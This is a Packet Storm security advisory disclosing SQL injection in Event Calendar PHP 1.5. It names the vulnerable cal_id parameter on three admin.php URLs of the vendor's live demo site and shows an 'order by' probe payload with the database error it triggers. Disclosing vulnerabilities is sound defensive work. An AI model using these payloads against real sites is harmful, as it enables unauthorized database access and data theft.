Event Calendar PHP 1.5 SQL Injection

2016-10-21T00:00:00
ID PACKETSTORM:139292
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-10-21T00:00:00

Description

                                        
                                            `=====================================================  
# Event Calendar PHP 1.5 - SQL Injection  
=====================================================  
# Vendor Homepage: http://eventcalendarphp.com/  
# Date: 21 Oct 2016  
# Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php  
# Version : 1.5  
# Platform : WebApp - PHP  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
=====================================================  
# PoC:  
Vulnerable Url:  
http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=[payload]  
http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_options&cal_id=[payload]  
http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_language&cal_id=[payload]  
Vulnerable parameter : cal_id  
Mehod : GET  
  
A simple inject :  
Payload : '+order+by+20--+  
http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+  
  
In response can see result :  
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by  
20-- '. Error: Unknown column '20' in 'order clause'  
  
Result of payload: Error: Unknown column '20' in 'order clause'  
=====================================================  
# Discovered By : Ehsan Hosseini  
=====================================================  
`